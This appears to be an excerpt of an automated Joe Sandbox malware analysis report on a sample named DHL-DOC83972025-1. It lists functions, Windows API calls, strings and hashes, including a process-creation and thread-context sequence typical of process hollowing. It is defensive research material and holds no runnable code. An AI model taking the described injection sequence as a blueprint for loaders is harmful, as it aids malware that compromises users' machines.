Instruction Fuzzy Hash: C4F0D4B56402D07AFB711B27AC48E7B2EBDD7CBF64B11406EFD00A25B1C6751850DAB8

Function 01186290 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 149
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01186180: Sleep.KERNELBASE(000001F4), ref: 01186191

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 011863C2

Strings

4YVK5SXKLMOFXJANKOX6Q1ALEPS, xrefs: 01186425, 01186428

Memory Dump Source

Source File: 00000000.00000002.1268632520.0000000001183000.00000040.00000020.00020000.00000000.sdmp, Offset: 01183000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1183000_DHL-DOC83972025-1.jbxd

Similarity

API ID: CreateFileSleep
String ID: 4YVK5SXKLMOFXJANKOX6Q1ALEPS
API String ID: 2694422964-2273758859
Opcode ID: b0e0ad0cdddf0b02033f1417167c2bb9c7d44b880204a31e4733a1c2404c8dd2
Instruction ID: 45a6f6ab43452a978636dd1dd6124c95125b5054cbd6fbf475d489f1692de099
Opcode Fuzzy Hash: b0e0ad0cdddf0b02033f1417167c2bb9c7d44b880204a31e4733a1c2404c8dd2
Instruction Fuzzy Hash: 34519330D04288EAEF16D7E8C854BDFBB75AF19304F048198D6487B2C1C7B90B48CBA6

Function 003F3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,003F3B0F,SwapMouseButtons,00000004,?), ref: 003F3B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,003F3B0F,SwapMouseButtons,00000004,?), ref: 003F3B61
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,003F3B0F,SwapMouseButtons,00000004,?), ref: 003F3B83

Strings

Control Panel\Mouse, xrefs: 003F3B3E

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 35e976c2053f2157473fec5205c43ff94ebebbc465c399ce52ec1dd6b98b90e5
Instruction ID: 8134270a2a92a796ddbbf04d5e29fbfcd8375d17960b1a58ebc70e2f9f1b5424
Opcode Fuzzy Hash: 35e976c2053f2157473fec5205c43ff94ebebbc465c399ce52ec1dd6b98b90e5
Instruction Fuzzy Hash: 6B112AB5511208FFDB228FA5DC94ABEB7BCEF05784B11486AA905D7210D2319E409764

Function 01185180 Relevance: 6.7, APIs: 4, Instructions: 720
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 0118593B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 011859D1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 011859F3

Memory Dump Source

Source File: 00000000.00000002.1268632520.0000000001183000.00000040.00000020.00020000.00000000.sdmp, Offset: 01183000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1183000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
Instruction ID: 4a0f471b0fc26440fd8b1db97a89817727025a2b431c1863dabf99852110e60e
Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
Instruction Fuzzy Hash: 97620A30A14258DBEB28DFA4C850BDEB776EF58300F1091A9D10DEB290E7759E81CF5A

Function 003F3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 004333A2

Part of subcall function 003F6B57: _wcslen.LIBCMT ref: 003F6B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 003F3A04

Strings

Line: , xrefs: 004333EB

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: 210187a97d08b12bae1799f53eae7a5ad1816d254bd8be2bbe9786d22ea92bb8
Instruction ID: 5bf7fccd08c82845ef5e2a3be71ff9f2b6e7319d4444be06bdd48e536fe11cbe
Opcode Fuzzy Hash: 210187a97d08b12bae1799f53eae7a5ad1816d254bd8be2bbe9786d22ea92bb8
Instruction Fuzzy Hash: 4431F671408308AAD322EB20DC45FFFB7E8AB45714F10492FFA99871A1DB749A48C7D6

Function 003F2DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00432C8C

Part of subcall function 003F3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003F3A97,?,?,003F2E7F,?,?,?,00000000), ref: 003F3AC2

Part of subcall function 003F2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003F2DC4

Strings

X, xrefs: 00432C5A
`eK, xrefs: 00432C85

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X$`eK
API String ID: 779396738-1346537380
Opcode ID: 00a3d213ee1c8a27cd506201949b0684678050293de055b75c7589361d4d0e4e
Instruction ID: 4d216a2b983eae82d93032a25bc849f3dc27e6623970c1ca2f7626888c175191
Opcode Fuzzy Hash: 00a3d213ee1c8a27cd506201949b0684678050293de055b75c7589361d4d0e4e
Instruction Fuzzy Hash: 96219371A0029C9BDF02DF95C845BEE7BFCAF49304F00805AE505AB241DBB85A898F65

Function 0040FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00410668

Part of subcall function 004132A4: RaiseException.KERNEL32(?,?,?,0041068A,?,004C1444,?,?,?,?,?,?,0041068A,003F1129,004B8738,003F1129), ref: 00413304

__CxxThrowException@8.LIBVCRUNTIME ref: 00410685

Strings

Unknown exception, xrefs: 00410692

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: af54a20313602de25bc57c08ca5b33bf1c69dab63c203dc8149abdbd9d5aa57e
Instruction ID: 25b58e9dd00dabb8604053a941049d324499e1fde9e684c9002ce85352ccf7fb
Opcode Fuzzy Hash: af54a20313602de25bc57c08ca5b33bf1c69dab63c203dc8149abdbd9d5aa57e
Instruction Fuzzy Hash: 83F0283480030C77CB00BA65DC46DDE776D5E00344B60447BB818A19D1EFBDDADAC58C

Function 00477F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 004782F5
TerminateProcess.KERNEL32(00000000), ref: 004782FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 004784DD

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 3977fb99ee9d21271be3a0520ad176f06629d5f098b46888f04c15a6823694e8
Instruction ID: 5724df7b5e02427648a4e5406c290367c4d18aa702a56a826ad94da50454618b
Opcode Fuzzy Hash: 3977fb99ee9d21271be3a0520ad176f06629d5f098b46888f04c15a6823694e8
Instruction Fuzzy Hash: DD127B71A083419FC724DF28C484B6ABBE1BF84318F04895EE9898B352DB75ED45CF96

Function 003F10F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 003F1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 003F1BF4
Part of subcall function 003F1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 003F1BFC
Part of subcall function 003F1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 003F1C07
Part of subcall function 003F1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 003F1C12
Part of subcall function 003F1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 003F1C1A
Part of subcall function 003F1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 003F1C22

Part of subcall function 003F1B4A: RegisterWindowMessageW.USER32(00000004,?,003F12C4), ref: 003F1BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 003F136A
OleInitialize.OLE32 ref: 003F1388
CloseHandle.KERNEL32(00000000,00000000), ref: 004324AB

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 83b47c510a2a0a6d1fe2a0befaa7e642c35daa482cf8885e9bee67d5850e98de
Instruction ID: d42dd8fe5398738003e78aa31e93bfc8e09452e6c2f0e273aa1b7fae4c113727
Opcode Fuzzy Hash: 83b47c510a2a0a6d1fe2a0befaa7e642c35daa482cf8885e9bee67d5850e98de
Instruction Fuzzy Hash: 15719DB8915204AFC3C4EF7AA945E653AE0BB8A344754857ED10ACB373EB348411CF6D

Function 004286AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,?,004285CC,?,004B8CC8,0000000C), ref: 00428704
GetLastError.KERNEL32(?,004285CC,?,004B8CC8,0000000C), ref: 0042870E
__dosmaperr.LIBCMT ref: 00428739

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: 4d8b93df137bab6849b0abe4c9433979cf5c79c647cfea4994315b2046695a5f
Instruction ID: 98e9af1c21c9f16a7be109a2694fc076fb17bcdfe0bc6e2884a96aa2092032d7
Opcode Fuzzy Hash: 4d8b93df137bab6849b0abe4c9433979cf5c79c647cfea4994315b2046695a5f
Instruction Fuzzy Hash: 3C012B3270663026D664A2357849B7F67594F91779FB9012FFC148B2D3DEBD8C82829C

Function 00401310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004017F6

Strings

CALL, xrefs: 004017C6

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 441e321d329e4d03e09968ef3057ed627fbc05bc859a1da091da039e8bfa751a
Instruction ID: 34246cf11f6dba799eb682630f94ed96fe3260e9cda5e42e80c2c0e8fd571d54
Opcode Fuzzy Hash: 441e321d329e4d03e09968ef3057ed627fbc05bc859a1da091da039e8bfa751a
Instruction Fuzzy Hash: 9822AE706083419FD714DF15C880B2ABBF1BF85318F14892EF486AB3A1D779E945CB9A

Function 003F3837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 003F3908

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 6ffdc423c08181168fc51ec9569c199b52d7ebd22a1928f100e94534f12decad
Instruction ID: 2fdfb64ce8883bd6e6133c9525237989cba79af8320890d076a0bdb95453694e
Opcode Fuzzy Hash: 6ffdc423c08181168fc51ec9569c199b52d7ebd22a1928f100e94534f12decad
Instruction Fuzzy Hash: D731F7705043049FE761DF24D884BA7BBF8FF49748F00082EFA9987261D775AA48CB56

Function 003F5745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,003F949C,?,00008000), ref: 003F5773
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,003F949C,?,00008000), ref: 00434052

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: cf11bc229dd1e018fcb965b1fc22e443ddcd056884056f7e5a307714320e831c
Instruction ID: 92cdb9aae47fd1782aff9bf183e3a7d6c2776af619393c64da38efcc1245769f
Opcode Fuzzy Hash: cf11bc229dd1e018fcb965b1fc22e443ddcd056884056f7e5a307714320e831c
Instruction Fuzzy Hash: 5A019230245225B6E3711A2ADC4EFAB7F98EF067B0F108311BB9C5A1E1C7B45854CB94

Function 0118517D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 0118593B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 011859D1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 011859F3

Memory Dump Source

Source File: 00000000.00000002.1268632520.0000000001183000.00000040.00000020.00020000.00000000.sdmp, Offset: 01183000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1183000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
Instruction ID: 84dd200c8dbd80505c35caae022049a4289e1a3237a92c3516fe4523b729438b
Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
Instruction Fuzzy Hash: 4112DD24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A

Function 0047709C Relevance: 1.8, APIs: 1, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: caa9326b5219ef611e63bdba224404d6b46459c8e798e5e999ccebb19cb74f7a
Instruction ID: d92c91272d6b2202969e203978a350a39d7b2d5a58c683acfc3b28b78a2fa012
Opcode Fuzzy Hash: caa9326b5219ef611e63bdba224404d6b46459c8e798e5e999ccebb19cb74f7a
Instruction Fuzzy Hash: 79D17E74A04209DFCB14DF98C881DEEBBB5FF48314F54805AE909AB391E734AD82CB95

Function 0040FC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 0040FD1F

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: f6da7b055596533f206f7f2cbad6e71f6ea9fcd3c853fff96e69119cd39c7117
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 5A313774A04109DBD728CF59D08196AF7A1FF49300B2482B6E80ADBB91D735EDC5CBC5

Function 003F4ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 003F4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,003F4EDD,?,004C1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 003F4E9C
Part of subcall function 003F4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 003F4EAE
Part of subcall function 003F4E90: FreeLibrary.KERNEL32(00000000,?,?,003F4EDD,?,004C1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 003F4EC0

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 003F4EFD

Part of subcall function 003F4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00433CDE,?,004C1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 003F4E62
Part of subcall function 003F4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 003F4E74
Part of subcall function 003F4E59: FreeLibrary.KERNEL32(00000000,?,?,00433CDE,?,004C1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 003F4E87

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: c0481ef253b6001c04fa6a45314aa8dd384696e479d87e67175133a4934a13c1
Instruction ID: 4befcbfb60330fab374d7ed69425debcaceff2151d42eea440f8930c58629fa4
Opcode Fuzzy Hash: c0481ef253b6001c04fa6a45314aa8dd384696e479d87e67175133a4934a13c1
Instruction Fuzzy Hash: 2A11C432610309AACB16BF60DC02FBE77A5AF54711F10442EF646AA1C1EE749A459754

Function 00428402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00428440

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 055ba1b6159ae2e1dfd1874c1389d1dbb52a61d1bf20343ff8caca708035630d
Instruction ID: 70162e2c190b87383a57f39c932a33c805c569f76856d04f10e7a51082b8de19
Opcode Fuzzy Hash: 055ba1b6159ae2e1dfd1874c1389d1dbb52a61d1bf20343ff8caca708035630d
Instruction Fuzzy Hash: AF111C75A0410AAFCB15DF58E94199F7BF5EF48314F14405AF804AB311EA31DA21CB69

Function 00425000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00424C7D: RtlAllocateHeap.NTDLL(00000008,003F1129,00000000,?,00422E29,00000001,00000364,?,?,?,0041F2DE,00423863,004C1444,?,0040FDF5,?), ref: 00424CBE

_free.LIBCMT ref: 0042506C

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction ID: b7aa4ace691c3fa9388ad823ca72a9b2d79f95fd92dbd8f54c6512465cf70c33
Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction Fuzzy Hash: BB014E723047146BE3318F55EC4195AFBECFB89370FA5051EE184932C0EA746805C778

Function 0041E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
